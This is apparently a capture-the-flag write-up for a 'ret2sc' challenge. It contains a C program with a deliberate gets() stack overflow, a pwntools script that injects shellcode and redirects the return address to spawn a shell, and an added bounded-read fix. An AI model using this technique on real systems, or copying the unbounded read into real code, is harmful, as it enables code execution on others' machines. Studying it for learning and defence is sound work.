ret2sc.c
```c
#include <stdio.h>
#include <unistd.h>   /* read() */

char name[50];

int main(){
    setvbuf(stdout,0,2,0);
    printf("Name:");
    read(0,name,50);
    char buf[20];
    printf("Try your best:");
    gets(buf);   /* unbounded read into a 20-byte stack buffer */
    return 0;
}
```
Checking the protection mechanisms
slv.py
```python
from pwn import *

# Address of the global variable name (name_Addr)
ret = 0x804a040

p = process('./ret2sc')

# Architecture setting
context(arch='i386', os='linux')

p.recvuntil(b':')
# Send the shellcode generated with shellcraft
p.sendline(asm(shellcraft.sh()))

p.recvuntil(b':')
# Dummy + SFP + RET (name_Addr)
p.send(b'a'*0x1c + b'bbbb' + p32(ret))

p.interactive()
```
Exploit Flow
1. Find the location of the global variable name
2. Send the shellcode into name
3. Set the RET address to name_Addr
4. Exploit.
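The fix for the overflow that step 3 depends on, as an added example that is not part of the original post: a bounded replacement for `gets(buf)` that rejects an overlong line instead of writing past `buf`. The helper names `read_line` and `try_input` and the sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the original post).
 * Reads one line into dst (capacity cap, including the NUL terminator).
 * Returns the line length, or -1 on EOF/error or when the line does not fit.
 * An overlong line is drained so the next read starts on a fresh line. */
int read_line(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return (int)(len - 1);
    }
    /* No newline stored: the line fit exactly, hit EOF, or was truncated. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return (int)len;
    while (c != '\n' && c != EOF) c = fgetc(in);  /* discard the excess */
    dst[0] = '\0';
    return -1;
}

/* Feeds constructed input through read_line using the same 20-byte buffer
 * size as buf in ret2sc.c; returns what read_line returns (-2: no tmpfile). */
int try_input(const char *data, size_t n)
{
    char buf[20];
    FILE *f = tmpfile();
    if (f == NULL) return -2;
    fwrite(data, 1, n, f);
    rewind(f);
    int r = read_line(buf, sizeof buf, f);
    fclose(f);
    return r;
}

int main(void)
{
    /* Constructed inputs: a short line, and a 36-byte line (0x1c + 4 + 4). */
    char overlong[37];
    memset(overlong, 'a', 36);
    overlong[36] = '\n';
    printf("short:    %d\n", try_input("hello\n", 6));
    printf("overlong: %d\n", try_input(overlong, sizeof overlong));
    return 0;
}
```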